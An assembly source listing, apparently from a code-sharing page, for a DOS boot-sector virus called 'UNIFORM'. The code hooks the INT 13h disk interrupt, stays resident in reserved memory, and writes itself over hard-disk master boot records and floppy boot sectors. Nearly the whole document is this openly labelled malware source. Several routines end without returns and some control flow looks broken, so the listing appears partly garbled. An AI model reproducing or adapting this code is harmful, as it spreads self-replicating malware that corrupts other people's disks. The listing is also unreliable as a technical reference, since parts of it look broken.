< prev
Assembly Source File
271 lines
.model tiny
.radix 16
boot_info struc ; bootsector structure
oem_name db 8 dup (?) ; oem name and version
sect_size dw ? ; bytes per sector
clust_size db ? ; sectors per cluster
res_secs dw ? ; reserved sectors before fat
fat_count db ? ; number of fats
root_size dw ? ; maximum root entries
tot_secs dw ? ; total sectors on disk
media_type db ? ; media type (unreliable)
fat_size dw ? ; sectors in fat (per fat)
track_secs dw ? ; sectors per track
head_count dw ? ; number of heads
hidn_secs dw ? ; hidden sectors
boot_info ends
BASE equ 7c00
org 100
install: mov ah,9
lea dx,msg
int 21
mov ax,3513
int 21
mov [old_int13],bx
mov [old_int13+2],es
mov ax,ds
add ax,7c0
mov ds,ax
lea dx,new_int13-BASE
mov ax,2513
int 21
lea dx,virus_end+400
int 27
msg db 0dh,0ah,'UNIFORM installed in memory!',0dh,0ah,'$'
org 7c00
virus equ $ ; virus also begins
boot_sector equ $
jmp boot_start ; jump to bootsector code
db 90
boot_data boot_info <'UNIFORM '> ; bootsector info
org boot_sector+3e ; bootsector code
boot_start: cli ; set initial registers, like
xor bx,bx ; stack and data segment
mov ds,bx
mov ss,bx
mov si,7c00
mov sp,si
sub word ptr ds:[413],virus_size_k ; reserve space for virus
int 12
push cs
pop ds
mov cl,6 ; read rest of virus in
shl ax,cl ; memory below tom
push ax
mov es,ax
xor di,di
mov cx,100
rep movsw
mov ax,offset init_boot-BASE
push ax
old_int13 dw 0,0 ; old int 13 pointer
init_boot: xor ax,ax
mov ds,ax
lea di,old_int13-BASE
lea ax,new_int13-BASE ; hook the int 13 vector
xchg ax,ds:[4*13]
mov ax,cs
xchg ax,ds:[4*13+2]
xor ax,ax ; read the original sector
mov es,ax ; at 0000:7C00
read_main_body: mov bx,7c00
push es
push bx
mov ax,0201
mov dx,0 ; this gets modified
drivehead equ word ptr $-2
mov cx,0 ; this gets modified
sectortrack equ word ptr $-2
int 13
jc read_main_body ; loop to read_main_body when
; a read error is occured
infect_mbr_now: mov ax,0201 ; this reads the mbr while
lea bx,virus_end-BASE ; the virus is resident,
push cs ; causing a mbr infection
pop es
mov cx,1
mov dx,80
int 13
retf ; return to 0000:7C00
check_boot: push es ; checks to see if the boot
pop ds ; sector is the same as the
push cs ; virus image. the zero flag
pop es ; is set when they are the same
mov si,bx
add si,boot_data-boot_sector
lea di,boot_data-BASE
mov cx,8
rep cmpsb
or cx,cx
chain_to_int13: jmp dword ptr cs:[old_int13-BASE] ; chain to original int 13
handle_int13: pushf ; call the original int 13
call dword ptr cs:[old_int13-BASE]
new_int13: cmp ah,2 ; is it a read command
jne chain_to_int13 ; no -> chain_to_int13
cmp dh,0 ; is it head 0
jne chain_to_int13 ; no -> chain_to_int13
cmp cx,1 ; is it sector 1
jne chain_to_int13 ; no -> chain_to_int13
cmp dl,2 ; is it diskdrive
ja harddisk ; no -> harddisk
handle: call handle_int13
jnc boot_read
retf 2
harddisk: cmp dl,80 ; is it the harddisk
jne chain_to_int13 ; no -> chain_to_int13
call handle_int13
jnc handle_mbr
retf 2
handle_mbr: pushf
push ds es si di cx
call check_boot
jnz infect_mbr
pop cx
mov cx,3
jmp read_mbr
infect_mbr: mov ax,0301
mov cx,3
mov cs:[sectortrack-BASE],cx
mov cs:[drivehead-BASE],dx
push ds
pop es
call handle_int13
jc it_is_done
mov ax,0301
lea bx,boot_sector-BASE
mov cx,1
push cs
pop es
call handle_int13
it_is_done: jmp wrong_media
push ds es si di cx
call check_boot
jnz infect_boot
push ds
pop es
pop cx
push bx bp
call find_data_sector
dec ax
call convert_sector
pop bp bx
read_mbr: mov ax,0201
boot_done: pop di si es ds
jmp chain_to_int13
infect_boot: add si,cx
add di,cx
push ax bx dx bp
mov cx,3e-0bh
rep movsb
push ds
pop es
push bx bp
call find_data_sector
dec ax
call convert_sector
pop bp
mov cs:[drivehead-BASE],dx
mov cs:[sectortrack-BASE],cx
push cx dx es
push cs
pop es
mov ax,0301
xor dh,dh
mov cx,1
lea bx,boot_sector-BASE
call handle_int13
jnc boot_altered
pop es dx cx bx
write_protect: pop bp dx bx ax
wrong_media: pop cx di si es ds
boot_altered: push ax bx bp
call find_data_sector
dec ax
call convert_sector
pop bp bx ax
pop es dx cx bx
mov ax,0301
call handle_int13
jmp write_protect
convert_sector: div es:[bp.track_secs+3] ; convert sector format
inc ah ; to cylinder, head and
xchg cl,ah ; cl = sector ; sector format
xor ah,ah
div es:[bp.head_count+3]
mov dh,ah
mov ch,al
find_data_sector: ; locate the first data sector
mov bp,bx ; of the drive
xor dx,dx
mov ax,es:[bp.fat_size+3]
xor cx,cx
mov cl,es:[bp.fat_count+3]
mul cx
add ax,es:[bp.res_secs+3]
mov bx,ax
mov ax,es:[bp.root_size+3]
mov cl,20
mul cx
mov cx,es:[bp.sect_size+3]
div cx
add ax,bx
db 'Rajaat'
org boot_sector+1fe
dw 0aa55 ; bootsector signature
virus_end equ $
virus_size_k equ (($-virus) / 400) + 1 ; virus size in kilobytes
end install ; end of virus code